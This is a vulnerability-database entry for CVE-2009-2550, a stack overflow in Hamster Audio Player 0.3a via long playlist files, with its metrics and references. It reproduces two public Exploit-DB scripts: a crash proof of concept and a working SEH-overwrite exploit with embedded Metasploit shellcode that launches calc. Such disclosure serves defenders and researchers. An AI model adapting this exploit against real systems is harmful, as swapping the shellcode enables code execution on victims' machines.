CVE-2009-2550 : Detail

CVE-2009-2550

Overflow
22.04%V3
Network
2009-07-20
17h25 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Stack-based buffer overflow in Hamster Audio Player 0.3a allows remote attackers to execute arbitrary code via a long string in a (1) .m3u or (2) .hpl playlist file.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-787 Out-of-bounds Write
The product writes data past the end, or before the beginning, of the intended buffer.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 9157

Publication date : 2009-07-14 22h00 +00:00
Author : ThE g0bL!N
EDB Verified : Yes

# Hamster Audio Player 0.3a Local BOF PoC my $crash="\x41" x 4113 ; open(myfile,'>>PoC.m3u')#/HPL print myfile $crash; # By ThE g0bL!N #Download:http://www.brothersoft.com/hamster-audio-player-download-235347.html #Note: His0k4 Win Rak :( # milw0rm.com [2009-07-15]
Exploit Database EDB-ID : 9172

Publication date : 2009-07-15 22h00 +00:00
Author : ThE g0bL!N
EDB Verified : Yes

#!/usr/bin/perl #[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH) #[+] Author : ThE g0bL!N #[+] Greetz to all my friends #[+] Tested on: Windows XP Pro SP2 (Fr) ##[+] Big thnx: His0k4 ########################################################## # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47". "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38". "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48". "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58". "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44". "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38". "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47". "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a". "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b". "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53". "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". "\x4e\x46\x43\x36\x42\x50\x5a"; my $junk="\x41" x (4103-length($shellcode)); my $jmp="\xE9\xF4\xEF\xFF\xFF"; my $next_seh="\xEB\xF9\x41\x42"; my $seh="\x0F\x39\x42\x00"; open(myfile,'>>exploit.m3u');#/hpl print myfile $shellcode.$junk.$jmp.$next_seh.$seh; # milw0rm.com [2009-07-16]

Products Mentioned

Configuraton 0

Ondanera>>Hamster_audio_player >> Version 0.3a

References

http://osvdb.org/55871
Tags : vdb-entry, x_refsource_OSVDB
http://www.exploit-db.com/exploits/9157
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/35825
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/9172
Tags : exploit, x_refsource_EXPLOIT-DB